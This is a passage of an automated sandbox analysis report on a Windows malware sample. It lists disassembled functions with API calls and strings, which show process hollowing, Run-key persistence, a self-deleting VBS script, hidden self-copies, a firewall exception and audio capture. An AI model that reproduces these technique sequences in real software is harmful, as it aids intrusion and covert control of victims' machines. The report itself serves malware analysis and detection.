                                              • Opcode Fuzzy Hash: 3f66010ca4bbd8cec7424b12d3089067c989c62d95de6c32389d2ecf475b48bc
                                              • Instruction Fuzzy Hash: 9071A27194015CBADB21AB618C82EEE77BCEF44704F1080BBB545B6192CE785E818FE8
                                              Function 000D7245 Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 290libraryloaderthreadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 000D728C
                                              • GetProcAddress.KERNEL32(00000000), ref: 000D728F
                                              • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 000D72A0
                                              • GetProcAddress.KERNEL32(00000000), ref: 000D72A3
                                              • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 000D72B4
                                              • GetProcAddress.KERNEL32(00000000), ref: 000D72B7
                                              • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 000D72C8
                                              • GetProcAddress.KERNEL32(00000000), ref: 000D72CB
                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 000D736C
                                              • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 000D7384
                                              • GetThreadContext.KERNEL32(?,00000000), ref: 000D739A
                                              • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 000D73C0
                                              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 000D7440
                                              • TerminateProcess.KERNEL32(?,00000000), ref: 000D7454
                                              • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 000D748B
                                              • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 000D7558
                                              • SetThreadContext.KERNEL32(?,00000000), ref: 000D7575
                                              • ResumeThread.KERNEL32(?), ref: 000D7582
                                              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 000D759A
                                              • GetCurrentProcess.KERNEL32(?), ref: 000D75A5
                                              • TerminateProcess.KERNEL32(?,00000000), ref: 000D75BF
                                              • GetLastError.KERNEL32 ref: 000D75C7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                              • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                              • API String ID: 4188446516-3035715614
                                              • Opcode ID: c32eb69a9546f16c343edffaee0097b64c156beba7a90c65ad867a99d4f5c2a8
                                              • Instruction ID: ce7e315ee516b2cf22fd63988fe02fa68f77620a1a9ba0b4e2764ad6468f2c9f
                                              • Opcode Fuzzy Hash: c32eb69a9546f16c343edffaee0097b64c156beba7a90c65ad867a99d4f5c2a8
                                              • Instruction Fuzzy Hash: E5A18DB1508304AFD7509F61DC49B6BBBF8FF48344F44482AF649C26A1E7B1E954CB62
                                              Function 000CC28E Relevance: 38.8, APIs: 6, Strings: 16, Instructions: 282registryCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 000D1699: TerminateProcess.KERNEL32(00000000,pth_unenc,000CE670), ref: 000D16A9
                                                • Part of subcall function 000D1699: WaitForSingleObject.KERNEL32(000000FF), ref: 000D16BC
                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 000CC38B
                                              • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 000CC39E
                                              • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 000CC3B7
                                              • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 000CC3E7
                                                • Part of subcall function 000CAFBA: TerminateThread.KERNEL32(000C99A9,00000000,001342F8,pth_unenc,000CBF26,001342E0,001342F8,?,pth_unenc), ref: 000CAFC9
                                                • Part of subcall function 000CAFBA: UnhookWindowsHookEx.USER32(001340F8), ref: 000CAFD5
                                                • Part of subcall function 000CAFBA: TerminateThread.KERNEL32(000C9993,00000000,?,pth_unenc), ref: 000CAFE3
                                                • Part of subcall function 000DB58F: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00125900,00000000,00000000,000CC267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 000DB5CE
                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00125900,00125900,00000000), ref: 000CC632
                                              • ExitProcess.KERNEL32 ref: 000CC63E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                              • String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                              • API String ID: 1861856835-1536747724
                                              • Opcode ID: 5b15bcc04b835abc96019a69f7b2ee4b8556b099e8a9d3a3956f93d8044b15c3
                                              • Instruction ID: 27464f35a9679b82e6607bac89509a20af68e1d3cffeacfea77022a24bfd0e3d
                                              • Opcode Fuzzy Hash: 5b15bcc04b835abc96019a69f7b2ee4b8556b099e8a9d3a3956f93d8044b15c3
                                              • Instruction Fuzzy Hash: E9915F316042505BD318FB20E852FEFB7A9AF96710F50852DF48A971D3EF70AE498662
                                              Function 000D12B5 Relevance: 38.7, APIs: 17, Strings: 5, Instructions: 189synchronizationsleepfileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateMutexA.KERNEL32(00000000,00000001,00000000,001342F8,?,00000000), ref: 000D12D4
                                              • ExitProcess.KERNEL32 ref: 000D151D
                                                • Part of subcall function 000D265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,001342F8), ref: 000D2679
                                                • Part of subcall function 000D265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 000D2692
                                                • Part of subcall function 000D265D: RegCloseKey.KERNEL32(00000000), ref: 000D269D
                                                • Part of subcall function 000DB61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,000C9F65), ref: 000DB633
                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 000D135B
                                              • OpenProcess.KERNEL32(00100000,00000000,000CE154,?,?,?,?,00000000), ref: 000D136A
                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 000D1375
                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 000D137C
                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 000D1382
                                                • Part of subcall function 000D27D5: RegCreateKeyA.ADVAPI32(80000001,00000000,00125554), ref: 000D27E3
                                                • Part of subcall function 000D27D5: RegSetValueExA.KERNEL32(00125554,000000AF,00000000,00000004,00000001,00000004,?,?,?,000CB94C,001260E0,00000001,000000AF,00125554), ref: 000D27FE
                                                • Part of subcall function 000D27D5: RegCloseKey.ADVAPI32(00125554,?,?,?,000CB94C,001260E0,00000001,000000AF,00125554), ref: 000D2809
                                              • PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000), ref: 000D13B3
                                              • GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000), ref: 000D140F
                                              • GetTempFileNameW.KERNEL32(?,temp_,00000000,?,?,?,?,?,?,?,?,00000000), ref: 000D1429
                                              • lstrcatW.KERNEL32(?,.exe,?,?,?,?,?,?,?,00000000), ref: 000D143B
                                                • Part of subcall function 000DB58F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 000DB5EB
                                                • Part of subcall function 000DB58F: WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 000DB5FF
                                                • Part of subcall function 000DB58F: CloseHandle.KERNEL32(00000000), ref: 000DB60C
                                              • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 000D1483
                                              • Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 000D14C4
                                              • OpenProcess.KERNEL32(00100000,00000000,000CE154,?,?,?,?,00000000), ref: 000D14D9
                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 000D14E4
                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 000D14EB
                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 000D14F1
                                                • Part of subcall function 000DB58F: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00125900,00000000,00000000,000CC267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 000DB5CE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExecuteExistsExitMutexNamePointerQueryShellSleepWritelstrcat
                                              • String ID: .exe$WDH$exepath$open$temp_
                                              • API String ID: 4250697656-3088914985
                                              • Opcode ID: f940d88ba5af400abefb8a1d458741a7d33199d07081e77186885a340ef57306
                                              • Instruction ID: c5672f7dbf8bca72b630ad87df9a32fa59a3f0f56887c22fc4e70de94dc77945
                                              • Opcode Fuzzy Hash: f940d88ba5af400abefb8a1d458741a7d33199d07081e77186885a340ef57306
                                              • Instruction Fuzzy Hash: 0D51C371A04319BBDB14ABA0AD49FFE73BD9B45710F004196B901A77C2DF749E868B60
                                              Function 000DA1BB Relevance: 38.7, APIs: 12, Strings: 10, Instructions: 180synchronizationCOMMON
                                              Download Yara Rule
                                              APIs
                                              • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 000DA2B2
                                              • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 000DA2C6
                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00125554), ref: 000DA2EE
                                              • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00133EE8,00000000), ref: 000DA2FF
                                              • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 000DA340
                                              • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 000DA358
                                              • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 000DA36D
                                              • SetEvent.KERNEL32 ref: 000DA38A
                                              • WaitForSingleObject.KERNEL32(000001F4), ref: 000DA39B
                                              • CloseHandle.KERNEL32 ref: 000DA3AB
                                              • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 000DA3CD
                                              • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 000DA3D7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                              • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                                              • API String ID: 738084811-1354618412
                                              • Opcode ID: 421e333c1a9d4b630579bc4e74de74020b0b802999bba84228c61cf92f7b1a14
                                              • Instruction ID: b2e19992fc6a190b85f1924039c5cb656e988cb0799aa7860421e2d160c09493
                                              • Opcode Fuzzy Hash: 421e333c1a9d4b630579bc4e74de74020b0b802999bba84228c61cf92f7b1a14
                                              • Instruction Fuzzy Hash: 3551BE71248304ABD214BB20EC92EFF3BADAB92354F10042EF456926A3DF705E598662
                                              Function 000C1BE8 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 000C1C54
                                              • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 000C1C7E
                                              • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 000C1C8E
                                              • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 000C1C9E
                                              • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 000C1CAE
                                              • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 000C1CBE
                                              • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 000C1CCF
                                              • WriteFile.KERNEL32(00000000,00131B02,00000002,00000000,00000000), ref: 000C1CE0
                                              • WriteFile.KERNEL32(00000000,00131B04,00000004,00000000,00000000), ref: 000C1CF0
                                              • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 000C1D00
                                              • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 000C1D11
                                              • WriteFile.KERNEL32(00000000,00131B0E,00000002,00000000,00000000), ref: 000C1D22
                                              • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 000C1D32
                                              • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 000C1D42
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$Write$Create
                                              • String ID: RIFF$WAVE$data$fmt
                                              • API String ID: 1602526932-4212202414
                                              • Opcode ID: 0efa78d77268bb9b7527240d373889f7fe0ceca9392834ac1df86ee3be78deb4
                                              • Instruction ID: 65cd053e945d326fdb9142f1c3b240a97d094562dc85f1775ff57f91cc2b1033
                                              • Opcode Fuzzy Hash: 0efa78d77268bb9b7527240d373889f7fe0ceca9392834ac1df86ee3be78deb4
                                              • Instruction Fuzzy Hash: 79414071544318BAE210DB51DD86FBBBEECEB85B54F40041AF644D60C0E7A4E909DBB3
                                              Function 000C64E0 Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Users\user\Desktop\4wECQoBvYC.exe,00000001,000C68B2,C:\Users\user\Desktop\4wECQoBvYC.exe,00000003,000C68DA,001342E0,000C6933), ref: 000C64F4
                                              • GetProcAddress.KERNEL32(00000000), ref: 000C64FD
                                              • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 000C650E
                                              • GetProcAddress.KERNEL32(00000000), ref: 000C6511
                                              • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 000C6522
                                              • GetProcAddress.KERNEL32(00000000), ref: 000C6525
                                              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 000C6536
                                              • GetProcAddress.KERNEL32(00000000), ref: 000C6539
                                              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 000C654A
                                              • GetProcAddress.KERNEL32(00000000), ref: 000C654D
                                              • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 000C655E
                                              • GetProcAddress.KERNEL32(00000000), ref: 000C6561
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AddressHandleModuleProc
                                              • String ID: C:\Users\user\Desktop\4wECQoBvYC.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                              • API String ID: 1646373207-3181818924
                                              • Opcode ID: cc73661e5a8020ed21c52eb556184e61303ac35b492b4268d923dc3cd2b09119
                                              • Instruction ID: 2e248e24efbae66b12708185874958a3348acdc565b06f2de06c33c40dcc25de
                                              • Opcode Fuzzy Hash: cc73661e5a8020ed21c52eb556184e61303ac35b492b4268d923dc3cd2b09119
                                              • Instruction Fuzzy Hash: 48012CA4E50B2675DB316B7B6C94E1BAEFD9F503A0318082BA401E35A5EFB8C4408E74
                                              Function 0040A208 Relevance: 28.3, APIs: 5, Strings: 11, Instructions: 306serviceCOMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 0040A20D
                                                • Part of subcall function 0040A0F2: __EH_prolog.LIBCMT ref: 0040A0F7
                                              • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,00000000), ref: 0040A347
                                                • Part of subcall function 0040953E: __EH_prolog.LIBCMT ref: 00409543
                                              • OpenServiceA.ADVAPI32(00000000,PnkBstrA,000F01FF,?,00000000), ref: 0040A47A
                                              • CloseServiceHandle.ADVAPI32(?,?,00000000), ref: 0040A4AD
                                              • CloseServiceHandle.ADVAPI32(00000000,?,00000000), ref: 0040A4B6
                                              Strings
                                              • &Test Services, xrefs: 0040A3E9
                                              • Install/Re-Install PunkBuster Service, xrefs: 0040A258
                                              • staticText, xrefs: 0040A4D2
                                              • **ERROR: Cannot open a handle to the service control manager. Please make sure you are the administrator for this computer., xrefs: 0040A36E
                                              • PnkBstrA, xrefs: 0040A472
                                              • button, xrefs: 0040A3D8
                                              • Un-Install/Remove PunkBuster Service, xrefs: 0040A269
                                              • Message, xrefs: 0040A361
                                              • , xrefs: 0040A52A
                                              • This program will help you install or un-install the PunkBuster Anti-cheat service.Please make your selection and then click "Next" to continue., xrefs: 0040A4E3
                                              • radioBox, xrefs: 0040A291
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: H_prologService$CloseHandleOpen$Manager
                                              • String ID: This program will help you install or un-install the PunkBuster Anti-cheat service.Please make your selection and then click "Next" to continue.$ $ **ERROR: Cannot open a handle to the service control manager. Please make sure you are the administrator for this computer.$&Test Services$Install/Re-Install PunkBuster Service$Message$PnkBstrA$Un-Install/Remove PunkBuster Service$button$radioBox$staticText
                                              • API String ID: 81804430-3789358379
                                              • Opcode ID: c08c51f1ec922e4f2c132f83c3c504c1061ff5f93906ae0e8dfd2920e58565db
                                              • Instruction ID: 9234b14ef658502d59a1c728953b6f4821128c5ba5519474f5c4182507258a31
                                              • Opcode Fuzzy Hash: c08c51f1ec922e4f2c132f83c3c504c1061ff5f93906ae0e8dfd2920e58565db
                                              • Instruction Fuzzy Hash: 48C18D70900349AEDB10EFA5CC46BEFBBB4AF04308F50456EF555B62D2CBB85A44CB69
                                              Function 000CBC67 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 203fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • _wcslen.LIBCMT ref: 000CBC75
                                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00134358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 000CBC8E
                                              • CopyFileW.KERNEL32(C:\Users\user\Desktop\4wECQoBvYC.exe,00000000,00000000,00000000,00000000,00000000,?,00134358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 000CBD3E
                                              • _wcslen.LIBCMT ref: 000CBD54
                                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 000CBDDC
                                              • CopyFileW.KERNEL32(C:\Users\user\Desktop\4wECQoBvYC.exe,00000000,00000000), ref: 000CBDF2
                                              • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 000CBE31
                                              • _wcslen.LIBCMT ref: 000CBE34
                                              • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 000CBE4B
                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00134358,0000000E), ref: 000CBE9B
                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00125900,00125900,00000001), ref: 000CBEB9
                                              • ExitProcess.KERNEL32 ref: 000CBED0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                              • String ID: 6$C:\Users\user\Desktop\4wECQoBvYC.exe$del$open
                                              • API String ID: 1579085052-641206610
                                              • Opcode ID: 781117e5e64a8f41af36e5f09c31d274e5268e466970229a7fcf079e879e9c33
                                              • Instruction ID: fe353b61d0c55e862c33df69c5306452bd0bc17c264a97bf325dfd7a1f1a14a1
                                              • Opcode Fuzzy Hash: 781117e5e64a8f41af36e5f09c31d274e5268e466970229a7fcf079e879e9c33
                                              • Instruction Fuzzy Hash: A951CE316042406BD618B720EC53FFF7BA9AF96B10F50041CF986D72C3DF64AD4582A6
                                              Function 000DB1BB Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • lstrlenW.KERNEL32(?), ref: 000DB1D6
                                              • _memcmp.LIBVCRUNTIME ref: 000DB1EE
                                              • lstrlenW.KERNEL32(?), ref: 000DB207
                                              • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 000DB242
                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 000DB255
                                              • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 000DB299
                                              • lstrcmpW.KERNEL32(?,?), ref: 000DB2B4
                                              • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 000DB2CC
                                              • _wcslen.LIBCMT ref: 000DB2DB
                                              • FindVolumeClose.KERNEL32(?), ref: 000DB2FB
                                              • GetLastError.KERNEL32 ref: 000DB313
                                              • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 000DB340
                                              • lstrcatW.KERNEL32(?,?), ref: 000DB359
                                              • lstrcpyW.KERNEL32(?,?), ref: 000DB368
                                              • GetLastError.KERNEL32 ref: 000DB370
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                              • String ID: ?
                                              • API String ID: 3941738427-1684325040
                                              • Opcode ID: 7420c7fdca1afa6e78a174024246cf556618c87c9ea55ce95e3ca5b321c02a72
                                              • Instruction ID: 4b90f81671e34f29b4dac71d3da82a822cf6e718dff78d7fbedfcdf0f1b98b29
                                              • Opcode Fuzzy Hash: 7420c7fdca1afa6e78a174024246cf556618c87c9ea55ce95e3ca5b321c02a72
                                              • Instruction Fuzzy Hash: 4A415072508305EBD720DFA19C489AFB7F8BF49754F41492BF541C22A0EB74C98897A2
                                              Function 00406661 Relevance: 26.5, APIs: 7, Strings: 8, Instructions: 298COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00406666
                                                • Part of subcall function 0040649F: __EH_prolog.LIBCMT ref: 004064A4
                                                • Part of subcall function 0040649F: 80000006.COMCTL32(?,?,?,?,?,?,?,?,00000001,?,00000401), ref: 00406630
                                              • 80000006.COMCTL32(?), ref: 004069DD
                                              • 80000006.COMCTL32(?), ref: 004069E2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: 80000006$H_prolog
                                              • String ID: Add failed: 0x%08lx$CoCreateInstance failed: 0x%08lx$Message$SysAllocString failed: 0x%08lx$WindowsFirewallAppIsEnabled failed: 0x%08lx$get_AuthorizedApplications failed: 0x%08lx$put_Name failed: 0x%08lx$put_ProcessImageFileName failed: 0x%08lx
                                              • API String ID: 3040914479-3210245531
                                              • Opcode ID: e017854d60634fd897c017ee63a1a635657d21458fa4df3517fe17c0784f15a3
                                              • Instruction ID: ec26c372339b50ef718af20037966b0fc6ad395da82280a397e0c79cd1b3e807
                                              • Opcode Fuzzy Hash: e017854d60634fd897c017ee63a1a635657d21458fa4df3517fe17c0784f15a3
                                              • Instruction Fuzzy Hash: 6FB1D3B0904158EEDB00EB95CC85FEEBBB9AF08318F65026EF156B32D1D6B85E04C765
                                              Function 0010E20E Relevance: 25.9, APIs: 17, Instructions: 419COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free$EnvironmentVariable$_wcschr
                                              • String ID:
                                              • API String ID: 3899193279-0
                                              • Opcode ID: 60df5bc2b6e57a719ba229d2798898c7281c89012363b44c5e904bdd8a3cbbad
                                              • Instruction ID: 9a0ec276fbab25adcf0c8f35b21b6edfa9196d8e1ea7e5274c4ea58435ebc5a6
                                              • Opcode Fuzzy Hash: 60df5bc2b6e57a719ba229d2798898c7281c89012363b44c5e904bdd8a3cbbad
                                              • Instruction Fuzzy Hash: A2D17B71E00304AFDF25AF76988267E7BE4AF11360F05496DF9C1EB2C1E7B199418B90
                                              Function 000D3E37 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109libraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 000D3E86
                                              • LoadLibraryA.KERNEL32(?), ref: 000D3EC8
                                              • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 000D3EE8
                                              • FreeLibrary.KERNEL32(00000000), ref: 000D3EEF
                                              • LoadLibraryA.KERNEL32(?), ref: 000D3F27
                                              • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 000D3F39
                                              • FreeLibrary.KERNEL32(00000000), ref: 000D3F40
